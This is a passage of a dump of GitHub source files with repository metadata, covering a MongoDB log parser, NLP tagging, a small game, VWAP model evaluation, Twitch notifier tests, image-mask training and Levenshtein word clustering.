x1, y1 = pos\n tw = th = size\n if (ow > tw or oh > th):\n return img.crop((x1, y1, x1 + tw, y1 + th))\n return img\n\n\ndef __hflip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\n\ndef __vflip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_TOP_BOTTOM)\n return img\n\n\ndef __print_size_warning(ow, oh, w, h):\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n","repo_name":"Sheng-T/FedMGD","sub_path":"data/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"31803168219","text":"\"\"\"\nParse replica set member's mongod.log. The member must have verbose logging\nenabled like:\n\n db.adminCommand({\n setParameter: 1,\n logComponentVerbosity: {tlaPlusTrace: 1}\n })\n\"\"\"\nimport datetime\nimport heapq\nimport re\nimport sys\nfrom json import JSONDecodeError\nfrom typing import Dict\n\nimport orjson\n\nfrom repl_checker_dataclass import repl_checker_dataclass\nfrom system_state import OplogEntry, CommitPoint, ServerState, OpTime\n\n# Match lines like:\n# 2019-07-16T12:24:41.964-0400 I TLA_PLUS_TRACE [replexec-0]\n# {\"action\": \"BecomePrimaryByMagic\", ...}\nline_pat = re.compile(\n r'(?P\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}.\\d{3}[+-]\\d{4})'\n r'.+? TLA_PLUS \\[(?P[\\w\\-\\d]+)] '\n r'(?P{.*})')\n\n\ndef parse_log_timestamp(timestamp_str):\n return datetime.datetime.strptime(timestamp_str, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n\n@repl_checker_dataclass(order=True)\nclass LogLine:\n # Ordered so that a sequence of LogLines are sorted by timestamp.\n timestamp: datetime.datetime\n location: str\n line: str\n obj: dict\n\n\ndef parse_log(stream):\n \"\"\"Yield LogLines parsed from a log file stream.\"\"\"\n\n def gen():\n line_number = 0\n for line in stream:\n line_number += 1\n match = line_pat.match(line)\n if not match:\n continue\n\n timestamp = parse_log_timestamp(match.group('timestamp'))\n try:\n obj = orjson.loads(match.group('json'))\n except JSONDecodeError as exc:\n print(f\"Invalid JSON in {stream.name}:{line_number}\"\n f\" {exc.msg} in column {exc.colno}:\\n\"\n f\"{match.group('json')}\")\n sys.exit(2)\n\n # Yield tuples\n yield LogLine(timestamp=timestamp,\n location=f'{stream.name}:{line_number}',\n line=line,\n obj=obj)\n\n return list(gen())\n\n\ndef merge_log_streams(streams):\n \"\"\"Merge logs, sorting by timestamp.\"\"\"\n return heapq.merge(*map(parse_log, streams))\n\n\n@repl_checker_dataclass\nclass LogEvent:\n timestamp: datetime.datetime\n \"\"\"The server log timestamp.\"\"\"\n location: str\n \"\"\"File name and line number, like 'file.log:123'.\"\"\"\n line: str\n \"\"\"The text of the server log line\"\"\"\n action: str\n \"\"\"The action (in TLA+ spec terms) the server is taking.\"\"\"\n server_id: int\n \"\"\"The server's id (0-indexed).\"\"\"\n currentTerm: int\n \"\"\"The server's view of the term.\n \n NOTE: The implementation's term starts at -1, then increases to 1, then\n increments normally. We treat -1 as if it were 0.\n \"\"\"\n state: ServerState\n \"\"\"The server's replica set member state.\"\"\"\n commitPoint: CommitPoint\n \"\"\"The server's view of the commit point.\"\"\"\n log: tuple\n \"\"\"The server's oplog.\"\"\"\n\n __pretty_template__ = \"\"\"{{ location }} at {{ timestamp | mongo_dt }}\n{{ action }} server_id={{ server_id }} state={{ state.name }} term={{ term }}\ncommit point: {{ commitPoint }}\nlog: {{ log | oplog }}\"\"\"\n\n\ndef _parse_term(term):\n # What the implementation calls -1, the spec calls 0.\n return 0 if term == '-1' else int(term)\n\n\ndef _parse_optime(obj):\n \"\"\" Convert an OpTime from JSON.\"\"\"\n # obj is like:\n #\n # {ts: {$timestamp: {t: 1578078726, i: 5}}, t: {$numberLong: '1'}}\n #\n # PyMongo's bson.json_util converts timestamp and numberLong objects but\n # it's more performant to special-case that logic here.\n as_int = obj['ts']['$timestamp']['t'] << 32 | obj['ts']['$timestamp']['i']\n return OpTime(term=_parse_term(obj['t']['$numberLong']), timestamp=as_int)\n\n\nclass OplogIndexMapper:\n \"\"\"Maps MongoDB oplog timestamps to TLA+ log indexes, 0-indexed.\"\"\"\n _optime_to_entry: Dict[OpTime, OplogEntry]\n\n def __init__(self):\n # The \"null\" commitPoint is (0, 0). Fake an OplogEntry for it.\n null_entry = OplogEntry(term=0, index=0, previous=None)\n self._optime_to_entry = {OpTime(0, 0): null_entry}\n self._empty = True\n\n def get_entry(self, optime):\n \"\"\"Get OplogEntry for OpTime.\"\"\"\n return self._optime_to_entry[optime]\n\n def add_entry(self, optime, entry):\n \"\"\"Add mapping from OpTime to OplogEntry object.\"\"\"\n if optime in self._optime_to_entry:\n old_entry = self._optime_to_entry[optime]\n assert old_entry == entry\n else:\n self._optime_to_entry[optime] = entry\n self._empty = False\n\n @property\n def empty(self):\n return self._empty\n\n\ndef parse_log_line(log_line, port_mapper, oplog_index_mapper):\n \"\"\"Transform a LogLine into a LogEvent.\"\"\"\n try:\n # Generic logging is in \"trace\", RaftMongo.tla-specific in \"raft_mongo\".\n trace = log_line.obj\n port = int(trace['host'].split(':')[1])\n raft_mongo = trace['state']\n optimes = [_parse_optime(optime) for optime in raft_mongo['log']]\n\n if optimes:\n if oplog_index_mapper.empty:\n # Add first entry at index 1.\n oplog_index_mapper.add_entry(\n optimes[0],\n OplogEntry(term=optimes[0].term,\n index=1,\n previous=None))\n\n # Iterate consecutive pairs of entries.\n for optime_a, optime_b in zip(optimes, optimes[1:]):\n # The previous optime must already have an OplogEntry.\n previous = oplog_index_mapper.get_entry(optime_a)\n oplog_index_mapper.add_entry(\n optime_b,\n OplogEntry(term=optime_b.term,\n index=previous.index + 1,\n previous=previous))\n\n log = oplog_index_mapper.get_entry(optimes[-1]).get_complete_log()\n else:\n log = ()\n\n commitPointOpTime = _parse_optime(raft_mongo['commitPoint'])\n commitPoint = CommitPoint(\n term=commitPointOpTime.term,\n index=oplog_index_mapper.get_entry(commitPointOpTime).index)\n\n return LogEvent(\n timestamp=log_line.timestamp,\n location=log_line.location,\n line=log_line.line,\n action=trace['action'],\n server_id=port_mapper.get_server_id(port),\n currentTerm=_parse_term(raft_mongo['term']['$numberLong']),\n state=ServerState[raft_mongo['serverState']],\n commitPoint=commitPoint,\n log=log)\n except Exception:\n print(f'Exception at {log_line.location}: {log_line.line}',\n file=sys.stderr)\n raise\n","repo_name":"mongodb-labs/repl-trace-checker","sub_path":"parse_log.py","file_name":"parse_log.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"69818383412","text":"import json, stanza\n\nnlp = stanza.Pipeline('en', processors='tokenize, pos, lemma, depparse')\n\nopen_list = ['E', 'A', 'B', 'C', 'D']\nfile_path = '/Users/tuanz_lu/PycharmProjects/Pytorch-learning'\n\nrestriction_num = 0\n\nfor open_tag in open_list:\n\tres = []\n\n\tfile = open(file_path+'/json_data/five/'+open_tag + '_data.json')\n\tfileJson = json.load(file)\n\tflag = 0\n\trequirements = []\n\tinputList = []\n\tinputList_cur = []\n\tfor i, one in enumerate(fileJson):\n\t\tif flag > i:\n\t\t\tinputList_cur = []\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = one[\":\"]\n\t\t\trequirements.append(line)\n\t\t\tif \"restriction\" in one:\n\t\t\t\trestriction_num += 1\n\t\t\t\tinputList_cur = one[\"restriction\"][\"()\"]\n\t\t\tflag = i + 1\n\t\t\twhile flag < len(fileJson) and fileJson[flag][\":\"] == line: # 合并同一个需求的operation\n\t\t\t\tif \"restriction\" in fileJson[flag]:\n\t\t\t\t\tfor p, test_one in enumerate(fileJson[flag][\"restriction\"][\"()\"]):\n\t\t\t\t\t\tinputList_cur.append(test_one)\n\t\t\t\tflag += 1\n\t\t\tinputList.append(inputList_cur)\n\n\tfor i, one in enumerate(requirements):\n\t\tdoc = nlp(one)\n\t\tfor sent in doc.sentences:\n\t\t\twords = sent.words\n\t\t\tone_sent = [i.text.lower() for i in words] # 根据stanza分出来的words拼成sentence的列表\n\t\t\ttag_list = [\"O\" for i in range(len(one_sent))] # 标记列表\n\t\t\tfor inp in inputList[i]:\n\t\t\t\tone_inp = inp.lower().split() # 每个output的分词列表\n\t\t\t\tll = len(one_inp)\n\t\t\t\tfor j in range(len(one_sent)):\n\t\t\t\t\tif one_sent[j:j + ll] == one_inp:\n\t\t\t\t\t\ttag_list[j] = \"B\"\n\t\t\t\t\t\tif ll != 1:\n\t\t\t\t\t\t\ttag_list[j + ll - 1] = \"E\"\n\t\t\t\t\t\tm = j + 1\n\t\t\t\t\t\twhile m < j + ll - 1:\n\t\t\t\t\t\t\ttag_list[m] = \"I\"\n\t\t\t\t\t\t\tm += 1\n\t\t\t\t\t\tbreak\n\t\t\tfor q, word in enumerate(sent.words):\n\t\t\t\tif word.text.lower() == \"then\" or word.text.lower() == \"only\":\n\t\t\t\t\topTag = 1\n\t\t\t\telse:\n\t\t\t\t\topTag = 0\n\t\t\t\tres.append(f'{word.text}\\t{word.xpos}\\t{word.deprel}\\t{opTag}\\t{tag_list[q]}\\n')\n\t\tres.append(\" \\n\")\n\n\tfw = open(file_path+'/exp/pre/restriction_pre_'+open_tag + '.txt', 'w')\n\tfor r in res:\n\t\tfw.write(r)\n\tfw.close()\n\n","repo_name":"ZacharyZhao55/ReqGen","sub_path":"req_gen_unilm/unilm/src/crf_project/exp/five_group/restriction_pre.py","file_name":"restriction_pre.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36512726150","text":"import random\r\nx,y=0,0\r\na=int(input(\"범위를 지정하세요\"))\r\nb=random.randint(0, a)\r\nc=random.randint(0, a)\r\ne=input(\"힌트 기능을 사용하겠습니까?\")\r\nif(e=='y'):\r\n e=1\r\n\r\nwhile True:\r\n d=input(\"wasd중 하나를 입력하세요\")\r\n if(d=='w'):\r\n y=y+1\r\n elif(d=='a'):\r\n y=y-1\r\n elif(d=='d'):\r\n x=x+1\r\n elif(d=='a'):\r\n x=x-1\r\n else:\r\n print(\"잘못된 입력입니다.\")\r\n if(y>a or y<0):\r\n print(\"벽에 막혔습니다. y를 0으로 초기화 합니다.\")\r\n y=0\r\n if(x>a or x<0):\r\n print(\"벽에 막혔습니다. x를 0으로 초기화 합니다.\")\r\n x=0\r\n print(\"x좌표:\",x,\"y좌표\",y)\r\n if(e==1):\r\n if(x==b):\r\n print(\"x좌표는 맞췄습니다.\")\r\n if(y==c):\r\n print(\"y좌표는 맞췄습니다.\")\r\n if(x==b and y==c):\r\n print(\"맞췄습니다!\")\r\n break\r\n ","repo_name":"bbasung1/treasure-hunt-py-ver-","sub_path":"treasure hunt.py","file_name":"treasure hunt.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35350261403","text":"import sys\nimport warnings\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nimport torch as t\n\nsys.path.append(str(Path(__file__).parent.parent.parent))\n\nfrom AlgorithmicStrategy import DataSet, TradeTime\n\nfrom MODELS import (\n JoyeLOB,\n OCET,\n LittleOB,\n MultiTaskLoss,\n logger,\n log_eval,\n setup_seed,\n)\n\nfrom tqdm import tqdm\n\nwarnings.filterwarnings(\"ignore\")\n\n\n@t.no_grad()\ndef evaluate(ocet: OCET):\n loss_global = []\n true_vwaps = []\n pred_vwaps = []\n for file in tqdm(test_files):\n if file not in joye_data:\n joye_data.push(file)\n tick = DataSet(file, ticker=\"000157.SZ\")\n llob_file = little_lob_folder / file.name\n if llob_file not in llob:\n llob.push(llob_file)\n tt = TradeTime(begin=9_30_00_000, end=14_57_00_000, tick=tick)\n pred_trade_volume_fracs = []\n true_trade_volume_fracs = []\n hist_trade_volume_fracs = []\n trade_price = []\n\n for ts, action in tt.generate_signals():\n if action[\"trade\"]:\n time_search, X, volume_hist, volume_today = joye_data.batch(\n file, timestamp=ts\n )\n if time_search is not None:\n X = t.tensor(X, dtype=t.float32)\n # logger.info(X.size())\n pred_frac = ocet(X)\n\n _, price = llob.batch(llob_file, ts)\n\n trade_price.append(price)\n\n hist_trade_volume_fracs.append(volume_hist)\n pred_trade_volume_fracs.append(pred_frac)\n true_trade_volume_fracs.append(volume_today)\n if sum(pred_trade_volume_fracs) > 1:\n pred_trade_volume_fracs[-1] = pred_trade_volume_fracs[-1] - (\n sum(pred_trade_volume_fracs) - 1\n )\n break\n if sum(pred_trade_volume_fracs) == 1:\n break\n\n market_vwap = llob.get_VWAP(llob_file)\n true_vwaps.append(market_vwap)\n pred_trade_volume_fracs = t.squeeze(t.stack(pred_trade_volume_fracs))\n\n additional_vwap = 0\n if t.sum(pred_trade_volume_fracs) < 1:\n rest = 1 - t.sum(pred_trade_volume_fracs)\n _, final_price = llob.batch(llob_file, tick.file_date_num + 14_57_00_000)\n additional_vwap = rest * final_price\n\n trade_price = t.Tensor(trade_price)\n pred_vwap = t.sum(pred_trade_volume_fracs * trade_price) + additional_vwap\n pred_vwaps.append(pred_vwap.item())\n\n hist_trade_volume_fracs = t.Tensor(hist_trade_volume_fracs)\n hist_trade_volume_fracs = hist_trade_volume_fracs / t.sum(\n hist_trade_volume_fracs\n )\n\n true_trade_volume_fracs = t.Tensor(true_trade_volume_fracs)\n true_trade_volume_fracs = true_trade_volume_fracs / t.sum(\n true_trade_volume_fracs\n )\n\n loss = loss_func.calculate_loss(\n pred_trade_volume_fracs,\n true_trade_volume_fracs,\n hist_trade_volume_fracs,\n market_vwap,\n pred_vwap,\n )\n # loss_global.append(loss.item())\n log_eval(file=file.stem, loss=loss.item())\n # plotter(loss_global, ylabel=\"loss\")\n # plt.figure()\n # plt.plot(pred_vwaps, label=\"pred\")\n # plt.plot(true_vwaps, label=\"true\")\n # plt.legend()\n # plt.show()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Arguments for the strategy\", add_help=True)\n parser.add_argument(\"-s\", \"--seed\", type=int, default=2333, help=\"set random seed\")\n parser.add_argument(\"-e\", \"--epoch\", type=int, default=20)\n parser.add_argument(\"--dataset\", type=str, default=\"./DATA/ML\")\n parser.add_argument(\"--model-save\", type=str, default=\"./MODEL_SAVE_1\")\n args = parser.parse_args()\n\n logger.info(\"Starting\".center(40, \"=\"))\n # t.set_default_tensor_type(t.cuda.FloatTensor)\n device = t.device(\"cuda:0\" if t.cuda.is_available() else \"cpu\")\n logger.info(f\"Set device: {device}\")\n\n setup_seed(args.seed)\n logger.info(\"Set seed: {}\".format(args.seed))\n\n tick_folder = Path.cwd() / \"../datas/000157.SZ/tick/gtja/\"\n tick_files = list(tick_folder.glob(\"*.csv\"))\n\n model_save_path: Path = Path().cwd() / args.model_save\n if not model_save_path.exists():\n model_save_path.mkdir(parents=True, exist_ok=True)\n logger.info(f\"Saving model parameters to {model_save_path}\")\n\n raw_data_folder = Path.cwd() / \"DATA/ML/RAW\"\n norm_data_folder = Path.cwd() / \"DATA/ML/NORM\"\n label_data_folder = Path.cwd() / \"DATA/ML/LABEL\"\n little_lob_folder = Path.cwd() / \"DATA/ML/LittleOB\"\n\n train_folder = Path().cwd() / \"DATA/ML/000157/train\"\n test_folder = Path.cwd() / \"DATA/ML/000157/test\"\n train_files = list(train_folder.glob(\"*.csv\"))\n test_files = list(test_folder.glob(\"*.csv\"))\n\n joye_data = JoyeLOB(window=100)\n llob = LittleOB(direction=\"BUY\")\n loss_func = MultiTaskLoss()\n ocet = OCET(\n num_classes=1,\n dim=100,\n depth=2,\n heads=4,\n dim_head=25,\n mlp_dim=200,\n )\n\n newest_model = model_save_path / \"500.ocet\"\n # para_dict = t.load(newest_model, map_location=device)\n para_dict = t.load(newest_model, map_location=t.device(\"cpu\"))\n ocet.load_state_dict(para_dict[\"model_state_dict\"])\n # ocet.to(device='cpu')\n # with t.no_grad():\n # ocet.eval()\n\n # optimizer = optim.Adam(ocet.parameters(), lr=0.0001, weight_decay=0.0005)\n\n \"\"\"\n Scripts begin\n \"\"\"\n evaluate(ocet)\n","repo_name":"Me2yhm/Algorithmic-Trading","sub_path":"AlgorithmicStrategy/TWAP_VWAP/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28579006930","text":"import sys\nimport unittest\n\nimport twitchNotifier\nfrom twitchApi import Stream\n\nsys.path.append(\"tests\")\nimport utils\n\n\nclass TwitchTests(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.bot = utils.StubIrcRobot()\n\t\tself.twitchClient = utils.StubTwitchClient(\"\")\n\n\t\ttwitchNotifier.config = utils.StubConfig()\n\t\ttwitchNotifier.STREAMS = [\n\t\t\tStream(self.twitchClient, \"test1\", 0),\n\t\t\tStream(self.twitchClient, \"test2\", 0)\n\t\t]\n\n\tdef testTwitchUsersLive(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[\n\t\t\t\t(\"testclient\", \"test1 is streaming Test Stream\"),\n\t\t\t\t(\"testclient\", \"test2 is streaming Test Stream 2\")\n\t\t\t],\n\t\t\tself.bot.messages\n\t\t)\n\n\tdef testTwitchUserNewStream(self):\n\t\t_newStream = {\n \"id\":\"2\",\n \"user_id\":\"1234567891\",\n \"user_name\":\"test1\",\n \"game_id\":\"509658\",\n \"game_name\":\"Just Chatting\",\n \"type\":\"live\",\n \"title\":\"Test Stream 3\",\n \"viewer_count\":2864,\n \"started_at\":\"2021-01-06T14:13:17Z\",\n \"language\":\"en\",\n \"thumbnail_url\":\"\",\n \"tag_ids\":[\"f08d5873-f0c7-4912-94ba-a41933b4c141\"]\n }\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.bot.clear()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].pop()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].append(_newStream)\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[(\"testclient\", \"test2 is streaming Test Stream 3\")],\n\t\t\tself.bot.messages\n\t\t)\n\n\tdef testTwitchUsersNoDupeNotification(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tfor stream in twitchNotifier.STREAMS:\n\t\t\tself.assertIsInstance(\n\t\t\t\tstream.lastNotification,\n\t\t\t\ttwitchNotifier.Notification\n\t\t\t)\n\n\t\tself.bot.clear()\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual([], self.bot.messages)\n\n\tdef testTwitchUsersStopNotification(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.bot.clear()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].pop()\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[(\"testclient\", \"test2 has stopped streaming.\")],\n\t\t\tself.bot.messages\n\t\t)\n","repo_name":"mernisse/ircbot","sub_path":"tests/test_twitchNotifier.py","file_name":"test_twitchNotifier.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"71845813812","text":"def cal(oper, a, b):\n if oper == '+':\n return a+b\n if oper == '-':\n return a-b\n if oper == '/':\n return a/b\n if oper == '*':\n return a*b\n\n\ndef dfs(num):\n if num >= len(arg) or arg[num] == 'x':\n return\n\n if len(arg[num]) == 3:\n left = dfs(arg[num][1])\n right = dfs(arg[num][2])\n return cal(arg[num][0], left, right)\n else:\n return arg[num][0]\n\n\n\nfor tc in range(1, 11):\n n = int(input())\n arg = ['x' for _ in range(1001)]\n for i in range(n):\n tmp = list(input().split())\n if tmp[1].isdigit():\n arg[int(tmp[0])] = [int(tmp[1])]\n else:\n arg[int(tmp[0])] = [tmp[1], int(tmp[2]), int(tmp[3])]\n ans = dfs(1)\n print(f'#{tc} {int(ans)}')\n","repo_name":"xktmxkem/TIL-Today-I-Learn","sub_path":"algorithm/in_class/사칙연산.py","file_name":"사칙연산.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14388102838","text":"class Item:\n pay_rate = 0.8 # The pay rate after 20% discount\n \n def __init__(self, name: str, price: float, quantity=0):\n # Run validations to the received arguments\n assert price >= 0, f\"Price {price} is not greater than zero!\"\n assert quantity >= 0, f\"Price {quantity} is not greater than zero!\"\n \n self.name = name\n self.price = price\n self.quantity = quantity\n \n def calculate_total_price(self):\n return (self.price * self.quantity)\n \n def apply_discount(self):\n self.price = self.price * self.pay_rate\n \n \nitem1 = Item(\"Phone\", 100, 5)\nitem2 = Item(\"Laptop\", 10000, 3)\n\n# print(Item.pay_rate) # This is how we acsess class attributes\n\nprint(Item.__dict__) # All the attributes for the class level\nprint(item1.__dict__) # All the attributes for the instance level\n\nitem1.apply_discount()\n\nitem2 = Item(\"Laptop\", 1000, 3)\nitem2.pay_rate = 0.7 # To change the default class attribute value\nitem2.apply_discount()\n\n","repo_name":"Tharindu-Dasantha/CS","sub_path":"python/oop/tute1/class_attribute.py","file_name":"class_attribute.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71507907253","text":"import torch\nimport torchvision\nimport torchvision.io\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom segnet import Segnet\nfrom torch import nn\n\nimage = Image.open(f\"image.png\")\nmask = Image.open(f\"mask.png\")\n\ntransform = torchvision.transforms.ToTensor()\nimage = transform(image)\nmask = transform(mask)\nmask1 = mask\nmask2 = mask1.clone()\nmask2[mask2==0] = 2\nmask2[mask2==1] = 0\nmask2[mask2==2] = 1\n\nprint(image.shape)\nprint(mask1.shape)\nprint(mask2.shape)\n\n\ns = Segnet()\ns.train()\ncriterion = nn.MSELoss()\n\n\nnum_epochs = 100\nfor epoch in range(num_epochs):\n image = image.reshape(1, 1, 28, 28)\n mask1 = mask1.reshape(1, 1, 28, 28)\n mask2 = mask2.reshape(1, 1, 28, 28)\n s.mask1 = nn.Parameter(mask1)\n s.mask2 = nn.Parameter(mask2)\n s.mask1.requires_grad = False\n s.mask2.requires_grad = False\n optimizer = torch.optim.Adam(s.parameters(), lr=1e-3, weight_decay=1e-5)\n y_hat = s(image)\n y = torch.zeros_like(y_hat)\n loss = criterion(y_hat, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch:{epoch + 1}, Loss:{loss.item():.4f}')\n\ntorch.save(s.state_dict(), 'models/cnn.h5')\n\nimage = image.reshape(1, 1, 28, 28)\nmask1 = torch.rand_like(image)\nmask2 = torch.rand_like(image)\nfor epoch in range(num_epochs):\n s = Segnet()\n s.mask1 = nn.Parameter(mask1)\n s.mask2 = nn.Parameter(mask2)\n s.load_state_dict(torch.load(\"models/cnn.h5\"))\n s.mask1 = nn.Parameter(mask1)\n s.mask2 = nn.Parameter(mask2)\n s.mask1.requires_grad = True\n s.mask2.requires_grad = True\n optimizer = torch.optim.Adam(s.parameters(), lr=1e-3, weight_decay=1e-5)\n y_hat = s(image)\n y = torch.zeros_like(y_hat)\n loss = criterion(y_hat, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch:{epoch + 1}, Loss:{loss.item():.4f}')\n mask1 = s.mask1.data\n mask2 = s.mask2.data\n\nplt.imshow(mask1.reshape(28,28))\nplt.show()\nplt.imshow(mask2.reshape(28,28))\nplt.show()\n","repo_name":"arf-themascoteers/seg","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2281400244","text":"import numpy as np\r\nimport random\r\nfrom sklearn.cluster import AffinityPropagation\r\nfrom sklearn.cluster import KMeans\r\nimport warnings\r\nimport distance\r\nimport pandas as pd\r\nimport os\r\nimport time\r\nimport logging\r\nfrom datetime import datetime\r\n\r\nwarnings.filterwarnings('error')\r\nlogging.basicConfig(filename='errors.log', level=logging.DEBUG)\r\npath = os.environ['ONEDRIVE'] + \"\\\\Documents\\\\2021\\\\Projects\\\\NLP_NN\\\\\"\r\nout_path = path + 'Aff_Prop_Output\\\\'\r\nfile = \"Test_List.csv\"\r\n\r\n\r\nclass Classify:\r\n\r\n def __init__(self, path=path, file=file, alg=0):\r\n self.words = pd.read_csv(path+file)\r\n self.alg = alg # 0-aff_prop / 1-km\r\n\r\n def transform_list(self, word_list=False):\r\n # TODO: underlier_id_type to pre-process\r\n words_transformed = []\r\n if word_list:\r\n if type(word_list, list):\r\n self.words = pd.Series(word_list)\r\n self.words = self.words.drop_duplicates()\r\n for w1 in self.words.values:\r\n for w2 in w1:\r\n s1 = w2.split(',')\r\n for w3 in s1:\r\n s2 = w3.split(';')\r\n for w4 in s2:\r\n words_transformed.append(w4)\r\n words_transformed = pd.Series(words_transformed).drop_duplicates().tolist()\r\n return words_transformed\r\n\r\n def get_word_list(self, word_list):\r\n if word_list:\r\n words2 = self.transform_list(word_list=word_list)\r\n else:\r\n words2 = self.transform_list()\r\n return words2\r\n\r\n def calc_levenshtein_dist(self, words, sample_size):\r\n words_array = np.asarray(random.sample(words, k=sample_size))\r\n print(\"Starting distance calculation..\")\r\n lev_similarity = -1*np.array([[distance.levenshtein(w1, w2) for w1 in words_array] for w2 in words_array])\r\n print(\"Finished distance calculation..\")\r\n return lev_similarity, words_array\r\n\r\n def run_km(self, lev_similarity, k_size):\r\n k = k_size\r\n km = KMeans(n_clusters=k, max_iter=100)\r\n km.fit(lev_similarity)\r\n return km if km else None\r\n\r\n def run_prop(self, lev_similarity):\r\n affprop = AffinityPropagation(affinity=\"precomputed\", damping=0.5, random_state=None)\r\n affprop.fit(lev_similarity)\r\n return affprop if affprop else None\r\n\r\n def main(self, run_times=100, sample_size=2500, word_list=False):\r\n words2 = self.get_word_list(word_list=word_list)\r\n word_dict = {'Word': [], 'Matches': []}\r\n for i in range(run_times):\r\n start = time.time()\r\n lev_similarity, words_array = self.calc_levenshtein_dist(words=words2, sample_size=sample_size)\r\n try:\r\n if self.alg == 0:\r\n cluster = self.run_prop(lev_similarity)\r\n for cluster_id in np.unique(cluster.labels_):\r\n word_dict['Word'].append(words_array[cluster.cluster_centers_indices_[cluster_id]])\r\n word_dict['Matches'].append(np.unique(words_array[np.nonzero(cluster.labels_ == cluster_id)]))\r\n elif self.alg == 1:\r\n # Note: for KM the clusters are not labelled as with Affinity Prop\r\n cluster = self.run_km(lev_similarity, sample_size)\r\n order_centroids = cluster.cluster_centers_.argsort()[:, ::-1]\r\n for cluster_id in np.unique(cluster.labels_):\r\n # print(\"Cluster ID: %d\" % i)\r\n # for j in order_centroids[i, :10]:\r\n # TODO: need to fix the word append with results=km.fit_predict\r\n word_dict['Word'].append(cluster_id)\r\n word_dict['Matches'].append(np.unique([words_array[match]\r\n for match in order_centroids[cluster_id, :60]]))\r\n else:\r\n print(\"Wrong algorithm selected.\")\r\n raise Warning(f\"Wrong input for algorithm type: alg={self.alg} is not a selection.\")\r\n\r\n except Warning as e:\r\n logging.log(level=logging.DEBUG,\r\n msg=f'{datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")} Query failed to run.')\r\n logging.error(e)\r\n print(\"Convergence failed, see the log.\")\r\n finally:\r\n end = time.time()\r\n runtime = (end - start) / 60\r\n logging.log(level=logging.INFO,\r\n msg=f'{datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")} Runtime: {runtime} minutes')\r\n print(f\"Completed in: {(end - start) / 60} mins\")\r\n return word_dict, cluster\r\n\r\n\r\nclass CompileApply:\r\n #TODO: connect the first class to this one, also allow for separate files as designed here\r\n\r\n def __init__(self, file_path: str = out_path):\r\n self.path = file_path\r\n self.files = [x for x in os.listdir(self.path) if x.find(\"file\") != -1]\r\n\r\n def get_df(self, files):\r\n df = pd.DataFrame()\r\n for file in files:\r\n df_temp = pd.read_csv(self.path+file)\r\n if not df_temp.empty:\r\n df = df.append(df_temp)\r\n df = df.reset_index()\r\n df = df.drop(labels='Unnamed: 0', axis=1)\r\n return df\r\n\r\n def get_unique(self):\r\n df = self.get_df(self.files)\r\n multi_matches = df.groupby(['Word'])['Matches'].nunique().sort_values()\r\n words = [x for x in multi_matches.index]\r\n return words, df\r\n\r\n def merge_matches(self):\r\n words, df = self.get_unique()\r\n word_dict = {word: [] for word in words}\r\n for word in words:\r\n match_list = []\r\n results = df['Matches'].loc[df['Word'] == word]\r\n # clean and get the results\r\n for row in results:\r\n row_matches = row.replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\"\\n\", \"\")\r\n row_matches = row_matches.split(\" \")\r\n for match in row_matches:\r\n match_list.append(match)\r\n # drop the duplicates\r\n match_list = pd.Series(match_list).drop_duplicates().tolist()\r\n # loop through results and append to dict if the result is not in the list already\r\n for match in match_list:\r\n if match not in word_dict[word]:\r\n word_dict[word].append(match)\r\n return word_dict\r\n\r\n def export_list(self):\r\n word_dict = self.merge_matches()\r\n df = pd.DataFrame.from_dict(word_dict, orient='index')\r\n df = df.transpose()\r\n 